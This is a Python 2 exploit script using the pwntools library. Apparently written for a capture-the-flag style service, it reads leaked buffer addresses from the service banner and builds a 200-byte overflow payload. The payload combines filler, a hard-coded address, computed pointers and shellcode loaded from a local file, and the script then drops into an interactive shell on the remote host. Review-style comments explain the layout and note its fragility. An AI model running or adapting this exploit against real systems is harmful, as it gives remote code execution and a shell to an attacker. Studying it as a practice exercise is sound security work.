# coding: utf-8
# Python 2 script (print statement, str/bytes concatenation): it talks to a
# remote service, pulls two buffer addresses out of its banner, builds a
# fixed-layout input from those addresses plus the contents of a local file,
# sends it, and hands the socket over to the user.
import os
import sys
import time
import re
import struct
import pwn
# Remote endpoint; constants here are specific to this one service instance.
host = 'www.termsec.net'
port = 17284
# Pack an int as a 4-byte little-endian value (struct '<I').
p = lambda x: struct.pack('<I', x)
s = pwn.remote(host, port)
# First read from the service; the banner is expected to contain
# "buffers at 0x... and 0x...". A single recv() may not return the whole
# line, and re.search() returns None on no match, so the .group() calls
# below raise AttributeError instead of reporting a clear error.
result = s.recv()
matches = re.search('buffers at (0x[0-9a-f]+) and (0x[0-9a-f]+)', result)
ptr_str1 = int(matches.group(1), 16)
ptr_str2 = int(matches.group(2), 16)
pwn.log.info('str1: 0x%x, str2: 0x%x' % (ptr_str1, ptr_str2))
# Input layout: 45 filler bytes, a hard-coded address (0x8049d08), two
# addresses computed relative to ptr_str1 (offsets 45+8 and 45+12, i.e. the
# two words that follow the packed values themselves), then the raw bytes of
# the local file 'x86-linux-sh'. The meaning of 0x8049d08 and of the two
# offsets depends on the target binary, which is not visible here.
# NOTE(review): the file handle from open() is never closed — a `with` block
# would release it deterministically.
payload = ('A' * 45) + p(0x8049d08) + p(ptr_str1 + 45 + 8) + p(ptr_str1 + 45 + 12) + open('x86-linux-sh', 'rb').read()
# Pad to exactly 200 bytes; if len(payload) already exceeds 200 this adds
# nothing and the length is not checked.
payload += 'B' * (200 - len(payload))
# Second input: a single packed constant.
payload2 = p(0xdeedbeef)
# Both inputs are newline-terminated; the service presumably reads lines.
s.send(payload + "\n")
s.send(payload2 + "\n")
# Dump whatever the service answers, then attach the terminal to the socket.
print s.recv()
s.interactive()